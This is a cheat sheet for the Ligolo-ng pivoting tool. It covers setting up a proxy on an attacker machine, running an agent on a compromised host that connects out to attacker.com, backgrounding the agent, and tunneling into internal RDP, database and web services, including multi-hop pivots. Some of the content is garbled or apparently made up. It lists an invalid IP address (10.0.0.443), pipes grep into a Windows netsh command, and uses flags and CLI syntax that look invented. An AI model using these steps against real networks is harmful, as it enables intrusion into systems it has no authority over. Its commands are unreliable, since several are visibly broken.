Ligolo-ng

Installation

Linux/macOS

# Download latest release
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.10/ligolo-ng_0.4.10_Linux_x86_64.tar.gz

# Extract
tar -xzf ligolo-ng_0.4.10_Linux_x86_64.tar.gz

# Make executable
chmod +x ligolo-ng

# Move to PATH
sudo mv ligolo-ng /usr/local/bin/

# Verify installation
ligolo-ng -h

Windows

# Download from releases
Invoke-WebRequest -Uri "https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.10/ligolo-ng_0.4.10_Windows_x86_64.zip" -OutFile "ligolo.zip"

# Extract
Expand-Archive ligolo.zip

# Or download manually from GitHub releases page
# Add to PATH if needed

Using Docker

# Build from source
git clone https://github.com/nicocha30/ligolo-ng.git
cd ligolo-ng
docker build -t ligolo-ng .

# Run proxy
docker run -it -p 11601:11601 ligolo-ng ./ligolo-ng -bind 0.0.0.0:11601 -selfcert

Architecture Overview

Components

┌─────────────────────┐
│  Attacker Machine   │
│   (Proxy Server)    │
│  ligolo-ng proxy    │
│  :11601 (listener)  │
└────────────┬────────┘
             │ TLS/TCP
      ┌──────┴──────┐
      │  Internet   │
      └──────┬──────┘
             │
┌────────────▼────────────┐
│ Compromised Host        │
│ (Pivot Point)           │
│ ligolo-ng agent         │
│ Connects to proxy       │
│ Routes traffic          │
└────────────┬────────────┘
             │
┌────────────▼────────────┐
│ Internal Network        │
│ Unreachable targets     │
│ 10.0.0.0/8             │
└─────────────────────────┘

Basic Setup

Proxy Server (Attacker Machine)

# Generate self-signed certificate
ligolo-ng -gen-cert -cert-file=cert.pem -key-file=key.pem

# Start proxy listener
ligolo-ng -bind 0.0.0.0:11601 -cert=cert.pem -key=key.pem

# Or without cert (auto-generate)
ligolo-ng -bind 0.0.0.0:11601 -selfcert

# With custom network interface
ligolo-ng -bind 192.168.1.100:11601 -selfcert

# Specify log level
ligolo-ng -bind 0.0.0.0:11601 -selfcert -loglevel=4

Agent (Compromised Machine)

# Connect to proxy
ligolo-ng -connect 192.168.1.100:11601 -tunnel-allow-insecure

# With certificate verification
ligolo-ng -connect 192.168.1.100:11601 -ca-file=ca.pem

# Background execution
nohup ligolo-ng -connect 192.168.1.100:11601 -tunnel-allow-insecure &

# Windows background execution
START /B ligolo-ng.exe -connect 192.168.1.100:11601 -tunnel-allow-insecure

Listener Management

Creating Listeners

# Interactive mode - add listener
# In ligolo-ng CLI:
listener add --bind 0.0.0.0:3389 --to 10.0.0.5:3389
listener add --bind 0.0.0.0:80 --to 10.0.0.10:80
listener add --bind 127.0.0.1:5432 --to 10.0.0.20:5432

# Multiple listeners
listener add --bind 0.0.0.0:8080 --to 10.0.0.1:8080
listener add --bind 0.0.0.0:8081 --to 10.0.0.2:8080
listener add --bind 0.0.0.0:8082 --to 10.0.0.3:8080

Listener Commands

# List active listeners
listener list

# Remove listener
listener remove --id=0

# View listener details
listener show --id=0

# Enable/disable listener
listener set --id=0 --enabled=false
listener set --id=0 --enabled=true

Tunnel Interface Management

Network Interface Configuration

# List tunnel interfaces
interface list

# Create virtual interface (Linux)
interface add --name=tun0 --address=10.0.0.1/24

# Add interface to active tunnel
interface attach --id=0 --name=tun0

# View interface routing table
interface show --id=0

# Delete interface
interface delete --id=0 --name=tun0

Routing Configuration

# Add static route through tunnel
interface route add --id=0 --network=10.0.0.0/8 --via=10.0.0.1

# View routes
interface route list --id=0

# Remove route
interface route delete --id=0 --network=10.0.0.0/8

# Default gateway through tunnel
interface route add --id=0 --network=0.0.0.0/0 --via=10.0.0.1

Practical Tunneling Scenarios

Scenario 1: RDP Access to Internal Server

# On attacker machine, start proxy
ligolo-ng -bind 0.0.0.0:11601 -selfcert

# On compromised machine, connect agent
ligolo-ng -connect attacker.com:11601 -tunnel-allow-insecure

# In proxy CLI, add RDP listener
listener add --bind 0.0.0.0:3389 --to 10.0.0.50:3389

# Connect RDP from attacker
rdesktop 127.0.0.1:3389
xfreerdp /v:127.0.0.1:3389 /u:admin /p:password

# Or via mstsc.exe on Windows
mstsc.exe /v:127.0.0.1:3389

Scenario 2: Database Access Through Pivot

# Add SQL Server listener
listener add --bind 127.0.0.1:1433 --to 10.0.0.100:1433

# Connect via tools on attacker
sqlcmd -S 127.0.0.1,1433 -U admin -P password -d database

# Or use GUI tools
# DBeaver: New Connection > SQL Server > localhost:1433

# Verify connectivity
nmap -p 1433 127.0.0.1

Scenario 3: Web Application Access

# Setup HTTP/HTTPS listeners
listener add --bind 0.0.0.0:8080 --to 10.0.0.80:80
listener add --bind 0.0.0.0:8443 --to 10.0.0.443:443

# Access via browser or curl
curl http://127.0.0.1:8080/
curl https://127.0.0.1:8443/ -k

# Burp Suite integration
# Burp > Proxy > Options > Upstream Proxy
# Server: 127.0.0.1, Port: 8080

Scenario 4: Chained Pivoting (Multi-hop)

# First pivot setup
# Attacker -> Pivot1
# Pivot1 runs agent connecting to attacker

# From pivot1, discover internal network
# Add second pivot
listener add --bind 0.0.0.0:11602 --to 10.0.0.2:11601

# On internal machine, connect to pivot1
ligolo-ng -connect 10.0.0.1:11602 -tunnel-allow-insecure

# Now can route through both pivots
listener add --bind 0.0.0.0:3306 --to 10.0.0.100:3306

Advanced Configuration

Interface Routing (Linux)

# Create tun interface for all traffic
interface add --name=tun0 --address=10.0.0.1/24

# Route specific subnet
sudo route add -net 10.0.0.0/8 gw 10.0.0.1

# Or use ip command
sudo ip route add 10.0.0.0/8 via 10.0.0.1 dev tun0

# View routing table
sudo route -n
ip route show

# Add default route through tunnel (be careful!)
sudo ip route add 0.0.0.0/1 via 10.0.0.1 dev tun0

Performance Tuning

# Increase buffer sizes (in proxy config)
ligolo-ng -bind 0.0.0.0:11601 -selfcert -buf-size=65536

# Set goroutines limit
ligolo-ng -bind 0.0.0.0:11601 -selfcert -max-conns=1000

# Optimize for high-bandwidth tunnels
ligolo-ng -bind 0.0.0.0:11601 -selfcert -tls-version=1.3

TLS Configuration

# Using custom certificates
ligolo-ng -bind 0.0.0.0:11601 \
  -cert=server.crt \
  -key=server.key \
  -ca=ca.crt

# Verify agent certificate
ligolo-ng -connect proxy.com:11601 \
  -ca-file=ca.crt \
  -cert-file=client.crt \
  -key-file=client.key

Troubleshooting

Connection Issues

# Test connectivity from agent to proxy
# On compromised machine
telnet attacker.com 11601
nc -zv attacker.com 11601

# Check firewall rules
# Linux
sudo iptables -L | grep 11601
sudo ufw status | grep 11601

# Windows
netsh advfirewall firewall show rule name=all | grep 11601

Routing Problems

# Verify routes are active
listener list
interface list

# Test connectivity to internal server
# Through listener (from attacker)
telnet 127.0.0.1 3389

# Check MTU
ping -M do -s 1472 internal.server

# Enable verbose logging
ligolo-ng -bind 0.0.0.0:11601 -selfcert -loglevel=4

Performance Issues

# Monitor tunnel statistics
# In CLI: tunnel info

# Check agent health
# In CLI: agent list

# Reduce listener count if needed
listener remove --id=X

# Monitor network
# Linux
iftop -i tun0
nethogs

Security Best Practices

Certificate Management

# Generate certificate with proper CN
openssl req -new -x509 -days 365 -nodes \
  -out cert.pem -keyout key.pem \
  -subj "/C=US/ST=State/L=City/O=Org/CN=proxy.domain.com"

# Verify certificate chain
openssl verify -CAfile ca.pem cert.pem

# Check certificate expiry
openssl x509 -in cert.pem -text -noout | grep "Not After"

Network Isolation

# Limit listener binding
listener add --bind 127.0.0.1:3389 --to 10.0.0.5:3389
# Only accessible from localhost

# Use firewall rules
sudo iptables -A INPUT -p tcp --dport 11601 -s attacker_ip -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 11601 -j DROP

Credential Security

# Use authentication if available
# Check for auth mechanism in documentation

# Disable insecure mode in production
# Instead of: -tunnel-allow-insecure
# Use proper certificate-based auth

# Monitor tunnel activity
listener show --id=0

CLI Command Reference

# Listener commands
listener add --bind <BIND> --to <TARGET>
listener remove --id=<ID>
listener list
listener show --id=<ID>

# Interface commands
interface add --name=<NAME> --address=<ADDR/MASK>
interface list
interface attach --id=<ID> --name=<NAME>
interface delete --id=<ID> --name=<NAME>
interface route add --id=<ID> --network=<NET> --via=<GW>
interface route list --id=<ID>

# Agent commands
agent list
agent info --id=<ID>
agent close --id=<ID>

# General
help
exit

References

• Ligolo-ng GitHub
• Ligolo-ng Documentation
• Network Pivoting Guide
• Red Teaming

---

Last updated: 2026-03-30